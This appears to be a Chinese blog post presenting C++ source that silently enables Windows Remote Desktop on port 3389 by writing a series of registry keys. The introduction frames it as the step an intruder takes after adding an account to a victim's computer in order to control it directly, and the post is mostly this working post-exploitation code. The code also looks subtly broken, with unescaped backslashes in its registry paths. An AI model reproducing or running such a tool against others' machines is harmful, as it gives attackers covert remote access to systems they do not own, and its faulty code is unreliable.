安全之路 —— C/C++开3389端口（远程终端）

简介

在渗透测试中开启对方电脑的3389端口是入侵者加入对方计算机账户后要想直接控制对方计算机的必须步骤，即开启对方计算机的远程终端功能，不同的Windows系统要开启3389需要修改不同的注册表项，为了方便，我们直接添加所有可能的注册表项，其中Windwos2000电脑需要重启激活，本程序并未添加此功能，需要的可参考笔者之前的博文：C/C++控制Windows关机/注销/重启的正确姿势。最后，要想关闭自己电脑的3389端口，可参考：关闭3389端口的方法。

注：本文在注册表资料上参考了《非安全》编辑部出版的《Hack编程实例精讲》系列书籍以及部分网络资料，在此致谢。

C++代码样例

#include <cstdio>
#include <cstdlib>
#include <cstring>
#include <iostream>
#include <windows.h>

using namespace std;

//封装字符型注册表操作
BOOL setStringValueToReg(HKEY hRoot, const char* szSubKey, const char* szValueName, const char* szValue)
{
    HKEY hKey;
    long lRet;
    if (lRet = RegCreateKeyEx(hRoot, szSubKey, 0, NULL, REG_OPTION_NON_VOLATILE, KEY_ALL_ACCESS, NULL, &hKey, NULL)) return false;
    if (lRet = RegSetValueEx(hKey, szValueName, 0, REG_SZ, (BYTE*)szValue, strlen(szValue))) return false;
    RegCloseKey(hKey);
    RegCloseKey(hRoot);
    return true;
}

//封装数值型（DWORD）注册表操作
BOOL setDWORDValueToReg(HKEY hRoot, const char* szSubKey, const char* szValueName, DWORD szValue)
{
    HKEY hKey;
    long lRet;
    if (lRet = RegCreateKeyEx(hRoot, szSubKey, 0, NULL, REG_OPTION_NON_VOLATILE, KEY_ALL_ACCESS, NULL, &hKey, NULL)) return false;
    if (lRet = RegSetValueEx(hKey, szValueName, 0, REG_DWORD, (BYTE*)&szValue, sizeof(DWORD))) return false;
    RegCloseKey(hKey);
    RegCloseKey(hRoot);
    return true;
}

int WINAPI WinMain(_In_ HINSTANCE hInstance, _In_opt_ HINSTANCE hPrevInstance, _In_ LPSTR lpCmdLine, _In_ int nShowCmd)
{
    DWORD PORT = 0x00000d3d; //可自定义远程终端的端口号，这里默认为3389
    setStringValueToReg(HKEY_LOCAL_MACHINE, "SOFTWARE\Microsoft\Windows\CurrentVersion\netcache", "Enabled", "0");
    setDWORDValueToReg(HKEY_LOCAL_MACHINE, "SOFTWARE\Policies\Microsoft\Windows\Installer", "EnableAdminTSRemote", 0x00000001);
    setStringValueToReg(HKEY_LOCAL_MACHINE, "SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon", "ShutdownWithoutLogon", "0");
    setDWORDValueToReg(HKEY_LOCAL_MACHINE, "SYSTEM\CurrentControlSet\Control\Terminal Server", "TSEnabled", 0x00000001);
    setDWORDValueToReg(HKEY_LOCAL_MACHINE, "SYSTEM\CurrentControlSet\Services\TermDD", "Start", 0x00000002);
    setDWORDValueToReg(HKEY_LOCAL_MACHINE, "SYSTEM\CurrentControlSet\Services\TermService", "Start", 0x00000002);
    setDWORDValueToReg(HKEY_LOCAL_MACHINE, "SYSTEM\CurrentControlSet\Control\Terminal Server", "fDenyTSConnections", 0x00000001);
    setDWORDValueToReg(HKEY_LOCAL_MACHINE, "SYSTEM\CurrentControlSet\Control\Terminal Server\RDPTcp", "PortNumber", PORT);
    setDWORDValueToReg(HKEY_LOCAL_MACHINE, "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp", "PortNumber", PORT);
    setDWORDValueToReg(HKEY_LOCAL_MACHINE, "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp", "PortNumber", PORT);
    setDWORDValueToReg(HKEY_LOCAL_MACHINE, "SYSTEM\CurrentControlSet\Control\Terminal Server", "fDenyTSConnections", 0x00000000);
    setStringValueToReg(HKEY_USERS, ".DEFAULT\Keyboard Layout\Toggle", "Hotkey", "2");
    ExitProcess(0);
    return 0;
}